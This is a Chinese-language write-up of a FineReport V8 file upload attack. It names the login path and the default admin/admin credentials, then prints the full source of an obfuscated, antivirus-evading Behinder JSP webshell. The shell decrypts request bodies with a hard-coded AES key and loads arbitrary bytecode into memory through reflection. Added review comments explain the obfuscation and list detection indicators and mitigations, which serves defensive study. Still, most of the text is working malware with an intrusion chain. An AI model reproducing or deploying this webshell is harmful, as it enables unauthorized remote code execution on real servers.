帆软V8文件上传漏洞


遇到的一个帆软V8文件上传漏洞,url得加上/WebReport/ReportServer?op=fs_load&cmd=fs_signin才能正常访问,不然是空白页

弱口令admin/admin 进去之后长这样

启动水滴工具,访问本地43023端口,用这个模块上传冰蝎jsp免杀马

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.*,
sun.misc.BASE64Encoder,javax.crypto.spec.SecretKeySpec" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.lang.reflect.Method" %>
<jsp:scriptlet>
    // NOTE(review): the Java compiler resolves unicode escapes before lexing, so this
    // is simply the string literal "POST" (compared against request.getMethod() below).
    // The escaped form only keeps the literal out of reach of naive static keyword scans.
    String pp =\u0022\u0050\u004f\u0053\u0054\u0022;
</jsp:scriptlet>
<%
    // NOTE(review): the escaped superclass name decodes to BASE64Decoder, i.e. the
    // sun.misc.BASE64Decoder brought in by the wildcard import above. The subclass has
    // an empty body and adds nothing; presumably it exists so the decoder's class name
    // never appears in plain text. The local variable shadows the class name on purpose.
    class b6 extends \u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072{}
    b6 b6 = new b6();
%>
<%!
    /**
     * Decrypts {@code a1} with AES/ECB/PKCS5Padding under the raw bytes of {@code k}.
     *
     * NOTE(review): this is the decryption stage of the Behinder-style ("冰蝎") loader
     * described in the write-up. The escaped method name decodes to {@code getInstance},
     * and {@code SecretKeySpec} is obtained through {@code Class.forName} plus a reflective
     * constructor call, so neither name appears literally. Detection indicator: AES in ECB
     * mode next to a reflective {@code ClassLoader.defineClass} inside a JSP declaration.
     *
     * @param a1 ciphertext bytes
     * @param k  key string; {@code k.getBytes()} uses the platform default charset
     * @return plaintext bytes, or {@code null} on any failure (the exception is only
     *         printed to stderr, so a bad key or padding error surfaces as an NPE in
     *         the caller rather than as an HTTP error)
     */
    public byte[] gg(byte[] a1,String k) {

        try {
            javax.crypto./*123*/Cipher c = javax.crypto.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e("AES/ECB/PKCS5Padding");
            c.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));
            return c.doFinal(a1);

        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }
%>

<%
    // NOTE(review): request-handling stage of the webshell; only POST requests reach it.
    if (request.getMethod().equals(pp)) {
        // Hard-coded 16-byte AES-128 key shared with the client tool. It appears to be the
        // widely documented default Behinder key, which makes it a reliable static signature
        // for file and memory scans.
        String k = "e45e329feb5d925b";
        // putValue is the deprecated spelling of setAttribute; the key lands in the session
        // under "u" — a second static indicator for session/heap inspection.
        session.putValue("u", k);
        // The first line of the request body is base64 text; once decoded it is AES-decrypted
        // by gg() into raw class-file bytes.
        BufferedReader reader = request.getReader();
        byte[] a1 = b6.decodeBuffer(reader.readLine());
        byte[] a2 = gg(a1,k);

        // defineClass is protected, so it is reached via reflection + setAccessible, and the
        // decrypted bytes are loaded straight into the context class loader. Nothing touches
        // disk: this is in-memory execution of arbitrary bytecode taken from the request.
        Method method2  = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass",byte[].class, int.class, int.class);
        method2.setAccessible(true);
        Class i = (Class) method2.invoke(Thread.currentThread().getContextClassLoader(),a2,0,a2.length);
        // The loaded class is instantiated and handed the pageContext; presumably its equals()
        // override is where the operator's payload runs (not visible here). Risk/mitigation:
        // any upload path that lets a JSP land under the webroot becomes RCE — the write-up's
        // entry point was the default admin/admin credentials on the report console, so
        // removing default credentials and blocking executable uploads closes this chain.
        Object Qvsa = i.newInstance();
        Qvsa.equals(pageContext);
    }
%>